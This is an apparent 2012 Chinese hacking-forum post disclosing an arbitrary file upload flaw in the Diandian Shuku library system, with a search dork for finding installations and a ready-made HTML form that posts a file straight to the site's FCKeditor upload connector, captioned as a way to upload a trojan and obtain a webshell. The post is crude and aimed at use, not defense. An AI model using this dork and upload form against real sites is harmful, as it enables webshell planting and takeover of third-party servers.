找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 9995|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
  d- A' T$ w  u 作者:冰锋刺客
6 l' O0 y+ s, q* r# w( d0 j" e 厂商:点击书(dianjishu.com). x0 e5 P  q, `: r# R
日期:2012-6-21
9 o; Y: D8 b1 P6 j , P. x$ y) X8 f
I 概述
& C  f0 \' V4 o" r8 O, n$ y' ~   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
# Y5 }4 m2 L" K" `8 } II 简介  `" s+ p7 f5 [
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"/ U1 P, R4 K9 d
补充一个漏洞
! p6 h; H2 R; Y: R <form id="frmUpload" enctype="multipart/form-data"
1 i2 T9 I* T( U# a3 j action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
) j" C$ c" ~+ y4 [ <input id="btnUpload" type="submit" value="操翻他">
9 h2 U$ J% y& n </form>
$ \6 O" M* L8 s( L4 f 你们懂的9 U9 \. D3 @  x9 f3 Y4 I
那傻逼提供还需要改包.  M$ y0 s1 {. T% v3 i
自己看了下源代码发现fckeditor
) U3 }/ O4 P, | 直接秒杀9 S+ L: j6 T( P0 u: ]0 x' k* a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表